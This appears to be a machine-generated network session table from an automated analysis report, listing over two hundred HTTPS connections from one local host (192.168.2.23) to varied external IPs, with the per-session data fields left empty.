                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10854192.168.2.2340684192.0.0.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10855192.168.2.2357652119.37.224.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10856192.168.2.2358678189.251.217.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10857192.168.2.2349414193.19.20.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10858192.168.2.2357328168.55.86.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10859192.168.2.2347666165.46.12.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10860192.168.2.2344258163.72.70.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10861192.168.2.235487234.217.26.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10862192.168.2.2348776219.251.180.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10863192.168.2.2359930142.182.12.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10864192.168.2.2352234161.231.201.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10865192.168.2.2357908217.173.153.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10866192.168.2.2340322177.175.209.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10867192.168.2.2355810176.115.101.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10868192.168.2.233308620.171.124.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10869192.168.2.234850218.9.74.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10870192.168.2.233695458.12.105.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10871192.168.2.2348116201.60.186.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10872192.168.2.2356610114.74.74.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10873192.168.2.2351030123.29.226.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10874192.168.2.2342494113.158.26.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10875192.168.2.2349568108.178.94.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10876192.168.2.235069445.200.86.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10877192.168.2.2349000121.225.154.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10878192.168.2.233296480.50.83.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10879192.168.2.2350170188.55.193.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10880192.168.2.2333804151.189.113.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10881192.168.2.2354628216.207.79.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10882192.168.2.2356440103.81.83.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10883192.168.2.2338742157.113.149.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10884192.168.2.2359818133.153.51.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10885192.168.2.235693414.82.158.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10886192.168.2.2344294208.191.107.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10887192.168.2.2343394222.85.45.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10888192.168.2.23597861.57.24.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10889192.168.2.235954248.174.60.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10890192.168.2.234074231.187.17.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10891192.168.2.2350478165.241.112.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10892192.168.2.235998690.123.2.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10893192.168.2.235307471.167.112.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10894192.168.2.2353008121.186.73.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10895192.168.2.2352452132.241.200.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10896192.168.2.2345668192.81.109.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10897192.168.2.2345126133.24.213.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10898192.168.2.2339616143.76.29.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10899192.168.2.235926443.56.125.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10900192.168.2.235313484.127.12.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10901192.168.2.23335882.84.158.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10902192.168.2.2360492118.147.69.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10903192.168.2.2341608197.141.32.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10904192.168.2.234084440.227.56.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10905192.168.2.2356442133.246.237.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10906192.168.2.235418031.220.246.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10907192.168.2.235358489.138.236.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10908192.168.2.233526684.178.220.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10909192.168.2.2359980206.58.216.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10910192.168.2.2342408122.228.218.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10911192.168.2.233622061.144.183.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10912192.168.2.2360822126.233.111.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10913192.168.2.2346752141.197.107.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10914192.168.2.236092019.99.52.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10915192.168.2.2357610208.143.91.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10916192.168.2.2359262190.70.102.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10917192.168.2.2340060129.106.177.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10918192.168.2.2337622136.207.84.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10919192.168.2.235186888.167.88.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10920192.168.2.2352772111.234.154.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10921192.168.2.233920051.178.159.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10922192.168.2.233792690.237.234.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10923192.168.2.2343538182.126.233.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10924192.168.2.2352362212.169.95.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10925192.168.2.2353916201.99.229.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10926192.168.2.2345852187.129.82.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10927192.168.2.2352462172.187.189.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10928192.168.2.2340928163.189.60.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10929192.168.2.234569212.71.218.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10930192.168.2.2341520104.135.252.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10931192.168.2.2356768197.45.141.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10932192.168.2.2334964194.43.234.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10933192.168.2.2357848141.80.249.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10934192.168.2.2348220138.220.48.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10935192.168.2.233290053.81.162.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10936192.168.2.2352274201.69.102.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10937192.168.2.2358526133.156.156.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10938192.168.2.2338918200.120.188.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10939192.168.2.233443694.218.253.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10940192.168.2.2340014196.76.199.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10941192.168.2.2337948114.122.194.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10942192.168.2.2349852185.194.49.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10943192.168.2.2339500151.235.38.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10944192.168.2.2344932121.65.33.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10945192.168.2.234327824.179.103.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10946192.168.2.233828237.204.90.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10947192.168.2.2353388144.0.248.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10948192.168.2.2358698103.26.158.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10949192.168.2.2347526151.201.118.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10950192.168.2.2339322128.177.182.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10951192.168.2.235411684.182.164.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10952192.168.2.2336734139.151.66.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10953192.168.2.2348408191.225.40.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10954192.168.2.2357632168.98.86.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10955192.168.2.233413295.117.76.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10956192.168.2.234661636.123.109.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10957192.168.2.2350852144.241.54.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10958192.168.2.234704273.107.210.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10959192.168.2.233427846.158.187.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10960192.168.2.2340990148.164.61.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10961192.168.2.2355664163.39.253.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10962192.168.2.234346646.181.43.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10963192.168.2.2349784100.188.132.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10964192.168.2.2340482194.101.136.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10965192.168.2.2351280116.35.52.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10966192.168.2.2335264211.166.197.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10967192.168.2.2348084185.34.28.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10968192.168.2.233364031.134.193.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10969192.168.2.2343828187.200.200.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10970192.168.2.2354328128.62.162.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10971192.168.2.234986294.171.74.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10972192.168.2.234968898.166.244.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10973192.168.2.2337654103.223.211.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10974192.168.2.23334309.94.96.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10975192.168.2.2348058120.63.239.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10976192.168.2.2359404108.252.82.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10977192.168.2.2354972120.172.95.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10978192.168.2.2355702210.54.206.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10979192.168.2.2346790101.0.140.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10980192.168.2.2354100170.164.87.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10981192.168.2.2334850168.206.147.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10982192.168.2.2348164157.175.138.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10983192.168.2.2346524153.254.51.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10984192.168.2.234024079.7.59.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10985192.168.2.235037823.8.42.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10986192.168.2.2349542189.129.129.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10987192.168.2.235127437.171.85.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10988192.168.2.2349424185.163.196.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10989192.168.2.2341532180.128.22.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10990192.168.2.235443891.185.107.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10991192.168.2.2344988216.111.111.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10992192.168.2.2339338111.208.101.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10993192.168.2.235930027.164.141.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10994192.168.2.234557493.33.243.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10995192.168.2.2358742104.22.158.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10996192.168.2.2356642102.230.31.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10997192.168.2.2342622154.102.125.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10998192.168.2.2356678193.52.77.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10999192.168.2.2346910201.2.200.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11000192.168.2.2354536154.132.108.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11001192.168.2.2335886166.67.62.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11002192.168.2.2345396132.12.104.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11003192.168.2.2342270166.4.206.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11004192.168.2.2344604220.82.108.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11005192.168.2.235183425.6.17.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11006192.168.2.2341894115.151.48.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11007192.168.2.235266446.40.226.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11008192.168.2.2334620130.44.50.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11009192.168.2.234581681.73.161.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11010192.168.2.234704846.201.246.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11011192.168.2.234963266.208.104.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11012192.168.2.2346288146.2.121.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11013192.168.2.2333196152.40.159.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11014192.168.2.235852677.38.151.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11015192.168.2.234777831.15.92.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11016192.168.2.233811483.98.220.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11017192.168.2.234310864.134.228.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11018192.168.2.2336998200.165.236.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11019192.168.2.2339452193.120.47.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11020192.168.2.235783631.130.255.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11021192.168.2.236056498.187.242.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11022192.168.2.2356598182.224.211.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11023192.168.2.2338030109.42.83.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11024192.168.2.235898027.19.4.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11025192.168.2.2337856219.58.53.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11026192.168.2.235931660.210.196.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11027192.168.2.234454490.3.248.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11028192.168.2.2333040170.66.194.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11029192.168.2.2345402118.236.40.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11030192.168.2.2342760143.14.65.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11031192.168.2.2350334119.252.65.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11032192.168.2.234263258.152.176.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11033192.168.2.234805852.97.20.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11034192.168.2.234157224.110.206.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11035192.168.2.2341178100.201.96.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11036192.168.2.236087219.50.155.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11037192.168.2.2346458184.114.239.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11038192.168.2.234904686.115.250.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11039192.168.2.23541448.95.82.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11040192.168.2.235147075.183.51.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11041192.168.2.2333854171.38.43.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11042192.168.2.2340590151.178.13.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11043192.168.2.235249488.235.213.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11044192.168.2.234436637.117.59.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11045192.168.2.235508492.232.232.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11046192.168.2.2357776147.96.25.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11047192.168.2.2334282197.18.128.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11048192.168.2.2336804175.39.152.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11049192.168.2.2334182223.121.213.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11050192.168.2.2333028111.229.158.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11051192.168.2.233864038.243.8.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11052192.168.2.2340842219.98.58.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11053192.168.2.2347296200.30.229.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11054192.168.2.2334126166.167.72.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11055192.168.2.23599085.17.77.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11056192.168.2.2342220187.168.106.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11057192.168.2.233459018.111.97.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11058192.168.2.235504850.249.29.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11059192.168.2.2339804202.194.41.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11060192.168.2.2357010108.241.217.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11061192.168.2.2336896182.60.252.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11062192.168.2.233952887.108.7.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11063192.168.2.2346728222.173.112.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11064192.168.2.233517496.245.117.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11065192.168.2.2348958102.25.58.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11066192.168.2.2352942117.216.134.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11067192.168.2.234322075.194.165.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11068192.168.2.234557423.245.111.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11069192.168.2.2342868123.253.182.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11070192.168.2.2339442135.155.173.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11071192.168.2.2333248223.7.5.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11072192.168.2.2334772116.202.145.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11073192.168.2.235721895.121.123.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11074192.168.2.234324878.146.45.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11075192.168.2.235444484.15.103.105443
